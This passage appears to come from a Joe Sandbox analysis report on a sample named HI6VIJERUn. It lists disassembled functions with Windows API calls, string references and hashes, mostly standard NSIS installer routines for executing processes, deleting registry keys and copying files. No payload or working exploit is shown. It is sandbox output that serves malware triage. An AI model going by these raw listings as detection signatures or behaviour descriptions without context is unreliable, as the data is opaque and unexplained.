                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                          • PIy, xrefs: 00402473
                                                                                                                                                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$PIy$`G
                                                                                                                                                                                                                                                                                                          • API String ID: 1033533793-3114273740
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(0000D000,00000064,0014F875), ref: 00403295
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00794950), ref: 00402387
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
